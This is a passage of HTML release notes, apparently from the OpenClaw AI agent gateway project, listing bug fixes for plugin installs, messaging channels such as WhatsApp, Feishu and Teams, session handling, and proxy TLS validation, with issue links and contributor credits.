<p>CLI/logs: auto-reconnect <code>openclaw logs --follow</code> on transient gateway disconnects with bounded backoff, stderr retry warnings, <code>[logs] gateway reconnected</code> recovery notices, and JSON <code>notice</code> records while still exiting immediately on non-recoverable auth or configuration errors. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355075599" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74782" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74782/hovercard" href="https://github.com/openclaw/openclaw/issues/74782">#74782</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357892191" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75059" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75059/hovercard" href="https://github.com/openclaw/openclaw/pull/75059">#75059</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362488693" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75372" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75372/hovercard" href="https://github.com/openclaw/openclaw/pull/75372">#75372</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shashank-poola/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shashank-poola">@shashank-poola</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RomneyDa/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RomneyDa">@RomneyDa</a>.</p>
</li>
<li>
<p>Codex/WhatsApp: keep the <code>message</code> dynamic tool available when Codex source replies are configured for message-tool delivery, so coding-profile chat agents do not complete turns privately without a visible channel reply. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371728923" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76660" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76660/hovercard" href="https://github.com/openclaw/openclaw/issues/76660">#76660</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371734457" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76663" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76663/hovercard" href="https://github.com/openclaw/openclaw/pull/76663">#76663</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/VishalJ99/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/VishalJ99">@VishalJ99</a>.</p>
</li>
<li>
<p>Codex/heartbeat: send heartbeat-specific initiative guidance through Codex turn-scoped collaboration-mode instructions, keeping ordinary message-tool chat turns in Default mode without heartbeat prompt leakage. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</p>
</li>
<li>
<p>Plugins/onboarding: trust optional official plugin and web-search installs selected from the official catalog so npm security scanning treats them like other source-linked official install paths. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Agents/web_search: keep installed runtime provider discovery enabled when web-search metadata is missing, so externally installed official providers such as Brave remain visible to agent and cron turns instead of falling back to bundled-only lookup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371532832" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76626" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76626/hovercard" href="https://github.com/openclaw/openclaw/issues/76626">#76626</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</p>
</li>
<li>
<p>Tests/plugins: expose the Discord npm onboarding Docker lane as a package script and assert planned Docker lanes point at real scripts, so external-channel onboarding coverage can actually run. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/ClawHub: explain unreleased ClawHub plugin artifacts as a rollout-state fallback to <code>npm:</code> installs instead of leaking raw archive metadata fields. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Tests/onboarding: assert packaged channel onboarding leaves <code>openclaw channels status --json</code> and plain <code>openclaw status</code> showing the configured channel, covering the empty Channels table regression path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Microsoft Teams: persist sent-message markers across Gateway restarts so follow-up replies to recent bot messages keep resolving the original conversation instead of dropping out after restart, with marker TTLs preserved on best-effort recovery. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363955622" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75585" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75585/hovercard" href="https://github.com/openclaw/openclaw/pull/75585">#75585</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</p>
</li>
<li>
<p>Matrix: persist pending approval reaction targets across Gateway restarts so room approvers can still approve or deny outstanding prompts after OpenClaw comes back online. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363955743" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75586" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75586/hovercard" href="https://github.com/openclaw/openclaw/pull/75586">#75586</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</p>
</li>
<li>
<p>Channels/onboarding: map third-party official WeCom and Yuanbao catalog entries to their published plugin ids so npm installs pass expected-plugin validation. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugin SDK: restore the Mattermost and Matrix compatibility subpaths used by the pinned Yuanbao channel package so external installs can module-load after npm install. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/install: keep managed npm-root security scans from treating earlier plugin <code>openclaw</code> peer links as failures, so one external plugin install cannot poison later official npm installs. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Memory LanceDB: allow installed-but-unconfigured plugin metadata to load so onboarding and setup flows can prompt for embedding config instead of failing the plugin registry first. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>CLI/plugins: keep <code>plugins enable</code> and <code>plugins disable</code> from creating unconfigured channel config sections, so channel plugins with required setup fields no longer fail validation during lifecycle probes. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Doctor/config: set <code>messages.groupChat.visibleReplies: "message_tool"</code> during compatibility repair for configured-channel configs that omit a visible-reply policy, so upgrades can persist the intended tool-only group/channel reply default. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kagura-agent/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kagura-agent">@kagura-agent</a>.</p>
</li>
<li>
<p>Agents/sessions: keep delayed <code>sessions_send</code> A2A replies alive after soft wait-window timeouts, while preserving terminal run timeouts and avoiding stale target replies in requester sessions. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370851415" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76443" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76443/hovercard" href="https://github.com/openclaw/openclaw/issues/76443">#76443</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ryswork1993/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ryswork1993">@ryswork1993</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>TUI/Control UI: fix <code>/think</code> command showing only base thinking levels when the active session uses a different model from the default, so provider-specific levels like DeepSeek V4 Pro's <code>xhigh</code> and <code>max</code> are now visible and selectable. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370999388" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76482" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76482/hovercard" href="https://github.com/openclaw/openclaw/issues/76482">#76482</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</p>
</li>
<li>
<p>CLI/sessions: keep intentional empty agent replies silent after tool-delivered channel output, instead of surfacing a misleading "No reply from agent." fallback. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Config/doctor: cap <code>.clobbered.*</code> forensic snapshots per config path and serialize snapshot writes so repeated <code>doctor --fix</code> recovery loops cannot flood the config directory. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370911177" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76454" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76454/hovercard" href="https://github.com/openclaw/openclaw/issues/76454">#76454</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4250740667" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65649" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65649/hovercard" href="https://github.com/openclaw/openclaw/pull/65649">#65649</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JUSTICEESSIELP/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JUSTICEESSIELP">@JUSTICEESSIELP</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rsnow/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rsnow">@rsnow</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Feishu: suppress duplicate text when replies send native voice media, preserve captions for ordinary audio files, and send fallback text plus attachment links when <code>audioAsVoice</code> transcode/upload fallback produces a generic file.</p>
</li>
<li>
<p>TTS/plugins: activate configured and inherited speech provider plugins during Gateway startup, so Microsoft and Local CLI voice replies work immediately after persona selection instead of staying invisible in the startup plugin set. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370996274" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76481" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76481/hovercard" href="https://github.com/openclaw/openclaw/issues/76481">#76481</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</p>
</li>
<li>
<p>Feishu: keep packaged Feishu startup from bundling the Lark SDK's ESM <code>__dirname</code> path by loading the SDK as a plugin-local runtime dependency. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370278565" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76291" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76291/hovercard" href="https://github.com/openclaw/openclaw/issues/76291">#76291</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371035544" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76494" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76494/hovercard" href="https://github.com/openclaw/openclaw/issues/76494">#76494</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370701342" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76392" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76392/hovercard" href="https://github.com/openclaw/openclaw/pull/76392">#76392</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zqchris/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zqchris">@zqchris</a>.</p>
</li>
<li>
<p>Plugins/npm: build package-local runtime dist files for publishable plugins and stop listing root-package-excluded plugin sidecars in the core package metadata, so npm plugin installs such as <code>@openclaw/diffs</code> and <code>@openclaw/discord</code> no longer publish source-only runtime payloads. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370790448" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76426" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76426/hovercard" href="https://github.com/openclaw/openclaw/issues/76426">#76426</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PrinceOfEgypt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PrinceOfEgypt">@PrinceOfEgypt</a>.</p>
</li>
<li>
<p>Channels/secrets: resolve SecretRef-backed channel credentials through external plugin secret contracts after the plugin split, covering runtime startup, target discovery, webhook auth, disabled-account enumeration, and late-bound web_search config. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370595346" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76371" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76371/hovercard" href="https://github.com/openclaw/openclaw/issues/76371">#76371</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370882504" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76449" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76449/hovercard" href="https://github.com/openclaw/openclaw/pull/76449">#76449</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/neeravmakwana/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/neeravmakwana">@neeravmakwana</a>.</p>
</li>
<li>
<p>Docker/Gateway: pass Docker setup <code>.env</code> values into gateway and CLI containers and preserve exec SecretRef <code>passEnv</code> keys in managed service plans, so 1Password Connect-backed Discord tokens keep resolving after doctor or plugin repair. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Control UI/WebChat: explain compaction boundaries in chat history and link directly to session checkpoint controls so pre-compaction turns no longer look silently lost after refresh. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370766004" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76415" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76415/hovercard" href="https://github.com/openclaw/openclaw/issues/76415">#76415</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a>.</p>
</li>
<li>
<p>Agents/compaction: add an optional bundled compaction notifier hook and retry once from the compacted transcript when automatic compaction leaves a turn without a final visible reply. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371697581" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76651" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76651/hovercard" href="https://github.com/openclaw/openclaw/pull/76651">#76651</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/simplyclever914/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/simplyclever914">@simplyclever914</a>.</p>
</li>
<li>
<p>Agents/incomplete-turn: detect and surface a warning when the agent's final text after a tool-call chain is silently dropped because the post-tool assistant response was never produced, instead of completing the turn with only the pre-tool analysis text. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370985585" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76477" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76477/hovercard" href="https://github.com/openclaw/openclaw/issues/76477">#76477</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</p>
</li>
<li>
<p>Channels/WhatsApp: attach native outbound mention metadata for group text and media captions by resolving <code>@+&lt;digits&gt;</code> and <code>@&lt;digits&gt;</code> tokens against WhatsApp participant data, including LID groups. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4041311446" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/39879" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/39879/hovercard" href="https://github.com/openclaw/openclaw/issues/39879">#39879</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4163220091" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56863" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/56863/hovercard" href="https://github.com/openclaw/openclaw/pull/56863">#56863</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kengi1437/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kengi1437">@kengi1437</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joe2643/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joe2643">@joe2643</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fridayck/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fridayck">@fridayck</a>.</p>
</li>
<li>
<p>Channels/WhatsApp: require outbound mention tokens to end at a word boundary so phone-number prefixes inside longer strings no longer trigger hidden native mentions.</p>
</li>
<li>
<p>Plugins/uninstall: remove empty managed git install parent directories after deleting cloned plugin repos and cover npm/git uninstall residue in Docker plugin lifecycle tests. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/install: resolve bare official external plugin IDs such as <code>brave</code> through the official catalog when no bundled source is available, so packaged installs fetch the intended scoped npm package instead of an unrelated unscoped package. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370601523" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76373" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76373/hovercard" href="https://github.com/openclaw/openclaw/issues/76373">#76373</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bek91/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bek91">@bek91</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/install: require OpenClaw-owned install provenance before granting official npm plugin scanner trust, so direct npm package names no longer bypass launch-code scanning while catalog, onboarding, and doctor installs stay trusted. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fede-kamel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fede-kamel">@fede-kamel</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Network proxy: preserve target TLS hostname validation for Node HTTPS requests routed through the managed HTTP proxy, so Discord-style CONNECT traffic no longer validates certificates against the local proxy host. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355182995" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74809" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74809/hovercard" href="https://github.com/openclaw/openclaw/issues/74809">#74809</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370848453" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76442" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76442/hovercard" href="https://github.com/openclaw/openclaw/pull/76442">#76442</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jesse-merhi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jesse-merhi">@jesse-merhi</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/abnershang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/abnershang">@abnershang</a>.</p>
</li>
<li>
<p>Gateway/sessions: keep <code>sessions.list</code> rows lightweight by bounding title/preview hydration to transcript head/tail reads and caching manifest model-id normalization plus setup fallback metadata against the active plugin snapshot. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rolandrscheel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rolandrscheel">@rolandrscheel</a>.</p>
</li>
<li>
<p>Gateway/performance: cache per-run verbose-level session reads, skip a redundant <code>lsof</code> scan in <code>gateway --force</code> when no listener was killed, and make the Gateway startup benchmark print usage for <code>--help</code>.</p>
</li>
<li>
<p>Gateway/sessions: keep agent runtime metadata on lightweight <code>sessions.list</code> rows and skip per-row transcript usage fallback, display model inference, and plugin projection, avoiding identity loss and event-loop stalls in large session stores. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Marvinthebored/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Marvinthebored">@Marvinthebored</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Gateway/models: keep read-only <code>models.list</code> fallbacks on persisted/current metadata, configured rows, registry-compatible fallbacks, and static auth checks while preserving full-catalog image attachment capability checks. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370624457" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76382" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76382/hovercard" href="https://github.com/openclaw/openclaw/issues/76382">#76382</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370567199" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76360" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76360/hovercard" href="https://github.com/openclaw/openclaw/issues/76360">#76360</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365118757" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75707" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75707/hovercard" href="https://github.com/openclaw/openclaw/issues/75707">#75707</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/trojy13/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/trojy13">@trojy13</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RayWoo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RayWoo">@RayWoo</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AnathemaOfficial/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AnathemaOfficial">@AnathemaOfficial</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Marvinthebored/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Marvinthebored">@Marvinthebored</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>CLI/plugins: reject missing plugin ids before config writes in <code>plugins enable</code> and <code>plugins disable</code> so a typo no longer persists a stale config entry. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343056975" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73554" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73554/hovercard" href="https://github.com/openclaw/openclaw/pull/73554">#73554</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ai-hpc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ai-hpc">@ai-hpc</a>.</p>
</li>
<li>
<p>Agents/sessions: preserve delivered trailing assistant replies during session-file repair so Telegram/WebChat history is not rewritten to drop already-delivered responses. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370427059" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76329" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76329/hovercard" href="https://github.com/openclaw/openclaw/issues/76329">#76329</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</p>
</li>
<li>
<p>Gateway/chat history: preserve oversized transcript turns as explicit omitted-message placeholders while avoiding large JSONL parse stalls. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Marvinthebored/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Marvinthebored">@Marvinthebored</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>CLI/doctor: load the configured memory-slot plugin when resolving memory diagnostics so bundled <code>memory-core</code> no longer triggers a false “no active memory plugin” warning on standalone <code>doctor</code> / <code>status</code> runs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370574756" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76367" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76367/hovercard" href="https://github.com/openclaw/openclaw/issues/76367">#76367</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/neeravmakwana/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/neeravmakwana">@neeravmakwana</a>.</p>
</li>
<li>
